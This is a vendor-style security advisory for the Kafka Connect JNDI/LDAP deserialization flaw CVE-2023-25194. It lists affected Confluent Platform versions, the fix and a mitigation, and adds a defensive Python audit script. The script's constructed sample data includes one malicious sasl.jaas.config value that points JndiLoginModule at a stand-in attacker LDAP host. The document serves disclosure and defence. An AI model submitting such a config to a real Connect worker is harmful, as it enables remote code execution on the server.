Version 1.0.2
CVE Reference: CVE-2023-25194
Impacted Confluent Platform (CP) versions
- CP versions 5.5.0 - 5.5.13, 6.0.0 - 6.0.11, 6.1.0 - 6.1.9, 6.2.0 - 6.2.8: not vulnerable by default. They become vulnerable only if the Connect worker configuration sets the “connector.client.config.override.policy” property to any value other than “None”.
- CP versions 7.0.0 - 7.0.7, 7.1.0 - 7.1.5, 7.2.0 - 7.2.3, 7.3.0 - 7.3.1: vulnerable by default, because the out-of-the-box configuration sets “connector.client.config.override.policy” to “All”.
Confluent Cloud Impact
Confluent Cloud is not impacted: managed connectors do not allow custom SASL JAAS configurations to be specified.
Recommended Action
Update (02/25/2023): Update to the latest Confluent Platform versions 5.5.14, 6.0.12, 6.1.10, 6.2.9, 7.0.8, 7.1.6, 7.2.4, 7.3.2 that are now published.
Issue Description
A security issue was identified in Apache Kafka Connect (CVE-2023-25194) that also applies to Confluent Platform (CP) Kafka Connect clusters. Exploitation requires access to the CP Kafka Connect worker (and its Connect REST APIs), together with the ability to create or modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. Connector client configuration overrides have been possible on CP Kafka Connect clusters since version 5.3.0.
When configuring a connector via the Confluent Platform Kafka Connect REST APIs, a caller can set the `sasl.jaas.config` property of any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule" through the “producer.override.sasl.jaas.config”, “consumer.override.sasl.jaas.config”, or “admin.override.sasl.jaas.config” connector properties.
For CP versions 5.5.0 through 6.2.8, connector client configurations cannot be overridden unless the Connect worker is reconfigured with a connector client override policy that permits such overrides.
For CP versions 7.0.0 through 7.3.1, users can specify these properties through connector configuration overrides out of the box, so default Confluent Platform Kafka Connect clusters on these versions are vulnerable.
Specifying such a custom SASL JAAS configuration for a Kafka client, whether under an overridden worker policy (CP versions <= 6.2.8) or the default Connect cluster configuration (CP versions >= 7.0.0), makes the worker connect to an attacker-controlled LDAP server and deserialize the untrusted LDAP response. This can be used to execute attacker-supplied Java code on the Confluent Platform Kafka Connect servers: successful exploitation results in unrestricted deserialization of untrusted data leading to Remote Code Execution (RCE), leveraging Java classes available on the classpath.
Fix
Confluent Platform patch release versions 5.5.14, 6.0.12, 6.1.10, 6.2.9, 7.0.8, 7.1.6, 7.2.4, 7.3.2 are now published. These releases add a configurable system property "-Dorg.apache.kafka.disallowed.login.modules" and, by default, disable the problematic login module "com.sun.security.auth.module.JndiLoginModule" in SASL JAAS configurations. Note that an explicit value for this property replaces the default list, so a deployment that sets it should keep "com.sun.security.auth.module.JndiLoginModule" in the list.
We advise all Confluent Platform customers to upgrade to the latest patch release versions listed above. If patching is not an option for any reason, follow the steps listed in the Mitigation section below.
Mitigation
We advise all Confluent Platform users to validate connector configurations, allow only trusted SASL JAAS configurations, and enforce network access controls so that CP Connect worker APIs are reachable only by trusted clients.
Additionally, as a mitigation, the following property can also be set in the Confluent Platform Connect worker configuration to prevent client configuration overrides:
connector.client.config.override.policy=None
With this property set on Confluent Platform Kafka Connect workers, connector-level client configuration overrides are disabled completely, which blocks the “*.override.sasl.jaas.config” properties that could otherwise lead to successful exploitation of this vulnerability.
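The override keys named in the Issue Description and the worker-side policy from this Mitigation section, as an added audit script (not Confluent's or Apache Kafka's code): it flags any connector whose sasl.jaas.config names the disallowed JndiLoginModule, reports the worker's effective override policy, and applies the mitigated setting. Connector configs are assumed to be supplied in the shape returned by the Connect REST endpoint GET /connectors/{name}/config; the sample connector and worker data below are constructed.

```python
"""Audit Kafka Connect connector configs and worker properties for the
CVE-2023-25194 pattern. Added example; all sample data is constructed."""
import re

# Login module the patched releases disallow by default via
# -Dorg.apache.kafka.disallowed.login.modules (per the advisory).
DISALLOWED_LOGIN_MODULES = frozenset({
    "com.sun.security.auth.module.JndiLoginModule",
})

# Connector-level client override keys named in the advisory.
OVERRIDE_KEYS = frozenset({
    "producer.override.sasl.jaas.config",
    "consumer.override.sasl.jaas.config",
    "admin.override.sasl.jaas.config",
})

# A JAAS config value begins with the login module class followed by a
# JAAS control flag; anything else is treated as unparseable.
_JAAS_HEAD = re.compile(
    r"^\s*([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)\s+"
    r"(required|requisite|sufficient|optional)\b",
    re.IGNORECASE,
)

POLICY_KEY = "connector.client.config.override.policy"


def login_module_of(jaas_config):
    """Return the login module class named in a sasl.jaas.config value, or None."""
    m = _JAAS_HEAD.match(jaas_config)
    return m.group(1) if m else None


def audit_connector(name, config):
    """Return (connector, key, module, verdict) tuples for suspicious JAAS settings."""
    findings = []
    for key, value in config.items():
        if not key.endswith("sasl.jaas.config"):
            continue
        module = login_module_of(str(value))
        if module is None:
            verdict = "unparseable JAAS config"
        elif module in DISALLOWED_LOGIN_MODULES:
            verdict = "disallowed login module (CVE-2023-25194 pattern)"
        elif key in OVERRIDE_KEYS:
            verdict = "client SASL override present; confirm it is trusted"
        else:
            continue
        findings.append((name, key, module, verdict))
    return findings


def audit_connectors(connectors):
    """Audit a dict of connector name -> config map."""
    findings = []
    for name, config in connectors.items():
        findings.extend(audit_connector(name, config))
    return findings


def _parse_properties(text):
    """Minimal Java .properties parser: key=value or key:value, '#'/'!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"^([^=:\s]+)\s*[=:]?\s*(.*)$", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def override_policy(worker_properties):
    """Return the configured override policy, or None when the key is absent.

    An absent key means the version's built-in default applies: "All" on
    CP 7.0.0-7.3.1 and "None" on CP 5.5.x-6.2.x according to the advisory.
    """
    return _parse_properties(worker_properties).get(POLICY_KEY)


def set_override_policy_none(worker_properties):
    """Return worker properties with the mitigation setting applied."""
    pattern = re.compile(r"^\s*" + re.escape(POLICY_KEY) + r"\s*[=:]")
    lines = [l for l in worker_properties.splitlines() if not pattern.match(l)]
    lines.append(POLICY_KEY + "=None")
    return "\n".join(lines) + "\n"


# Constructed sample: one connector abusing the JNDI module, one legitimate
# PLAIN override, one with no client overrides at all.
SAMPLE_CONNECTORS = {
    "orders-sink": {
        "connector.class": "org.example.OrdersSinkConnector",  # hypothetical class
        "consumer.override.security.protocol": "SASL_PLAINTEXT",
        "consumer.override.sasl.mechanism": "PLAIN",
        "consumer.override.sasl.jaas.config": (
            'com.sun.security.auth.module.JndiLoginModule required '
            'user.provider.url="ldap://attacker.invalid:1389/x";'
        ),
    },
    "metrics-source": {
        "connector.class": "org.example.MetricsSourceConnector",  # hypothetical class
        "producer.override.sasl.jaas.config": (
            'org.apache.kafka.common.security.plain.PlainLoginModule required '
            'username="svc-metrics" password="REDACTED";'
        ),
    },
    "clean-sink": {"connector.class": "org.example.CleanSinkConnector", "tasks.max": "1"},
}

# Constructed worker config resembling the CP 7.x out-of-the-box policy.
SAMPLE_WORKER_PROPERTIES = """\
bootstrap.servers=localhost:9092
group.id=connect-cluster
connector.client.config.override.policy=All
"""

if __name__ == "__main__":
    for finding in audit_connectors(SAMPLE_CONNECTORS):
        print("%s %s -> %s: %s" % finding)
    print("worker override policy:", override_policy(SAMPLE_WORKER_PROPERTIES))
    print(set_override_policy_none(SAMPLE_WORKER_PROPERTIES))
```

In a live check, replace SAMPLE_CONNECTORS with the result of calling GET /connectors and then GET /connectors/{name}/config for each name, and feed the audit the worker's properties file; a "disallowed login module" finding on an unpatched worker, or an override policy other than "None", is the condition the advisory describes.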
CVSS Score: 8.8 (CVSS v3.1)
Revision Log
Date | Status Update
02/16/2023 | Version 1.0.0 published
02/17/2023 | Version 1.0.1 published with an updated date for the patch releases carrying the permanent mitigation, to be released on 02/24/2023, in the "Updated timeline for release of permanent mitigation fix versions" section
02/25/2023 | Version 1.0.2 published with an update on the published patch release versions, as noted in the "Fix" section